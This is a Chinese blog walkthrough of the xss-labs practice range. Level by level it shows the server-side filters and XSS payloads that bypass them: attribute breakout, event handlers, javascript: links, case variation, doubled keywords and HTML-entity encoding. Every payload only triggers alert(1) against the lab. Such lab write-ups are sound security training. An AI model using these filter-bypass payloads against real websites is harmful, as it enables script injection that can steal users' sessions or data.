xss靶场实战(xss-labs-master靶场)

本文详细描述了XSSLabs挑战中的各级别,涉及URL修改、JavaScript代码执行、HTML编码技巧、过滤机制规避,以及如何通过伪协议和HTML实体编码来绕过安全检查,实现跨站脚本攻击。
摘要由CSDN通过智能技术生成

xss-labs-master靶场链接:https://pan.baidu.com/s/1X_uZLF3CWw2Cmt3UnZ1bTw?pwd=gk9c 
提取码:gk9c

xss-labs level 1 修改 url 地址中的name=<script>alert(1)</script>,便可以通关

level 2 在搜索框中输入的 JS 代码无法执行

查看网页源码可以发现表单提交的参数被存储在了value属性中

 

修改闭合方式来闭合value值,插入 js 代码便能执行

"><script>alert(1)</script>

 

level 3 和上一关的情况差不多,输入值包含在value属性中

 测试发现">无法闭合属性值,可能是符号被转义

 

构造 poc 对响应包中的value属性进行闭合,提交后再次点击搜索框便会弹出弹窗

' οnclick='alert(1)

 

level 4 查看第四关响应包,可以发现后台对尖括号<>进行了过滤

 箭头 2 处却是把<和>删除了但是,事件触发却不需要使用这两个符号。

直接使用事件闭合,注意这关的闭合符为双引号,提交后点击搜索框便会弹窗

" οnclick="alert(1)

" οnfοcus=javascript:alert('xss') "

level 5  查看响应包,可以发现<script>标签中被添加了一个下划线,变成了

<scr_ipt>,导致 JS 代码无法别识别

可以不使用<script>,使用链接标签中的javascript:伪协议来执行 JS 代码,点击插入的链接便会弹窗

"><a href="javascript:alert(1)">

"> <a href=javascript:alert('xss') > <"

 

level 6 和上一关类似,这次除了<script>标签,<a>标签的href值也会插入一个下划线

 而且<img>标签的src属性和onerror属性也会被插入下划线

 

通过大小写转换可以绕过过滤

"><a hrEF="javascript:alert(1)">

level 7 查看响应包,可以看到后台对script字符串进行了过滤

 通过双写script字符串可以绕过过滤

"><scscriptript>alert(1)</scscriptript>

level 8[编码绕过]

从响应包可以看出,系统对表单中的双引号、尖括号进行了转义,在script字符串中插入了下划线(<和>被编码在 href 属性值中script字符被插入了_字符破坏语义)

 

构造 poc 插入<a>标签的href标签中,利用伪协议执行 JS 代码弹窗:

javascript:alert(1)

将 poc 进行 HTML 实体编码后提交,点击链接后便会弹窗

https://config.net.cn/tools/HtmlEncode.html

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#10

8;&#101;&#114;&#116;&#40;&#49;&#41;

用来闭合引号的引号也被编码。

onfocus 一类的事件也被破坏尝试大小写绕过,也失败我们可以将要提交的 js 代码转成实体

 level 9[检测关键字]用第 8 关的方式说链接不合法弹框的信息里面包含http://就可以了

 

提交的参数值插入到了标签的 value 属性值中

但是在标签的 href 属性中却并没有出现该参数值,

而是显示的 "您的链接不合法?有没有!"这样的字符串。

有可能是将我们的代码进行了过滤

只有包含正常的 url 地址才能添加到 href 属性值中构造一个有正常 url 地址的恶意代码:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert('xsshttp://')

弹框的信息里面包含http://就可以了

  

 

 

  • 15
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值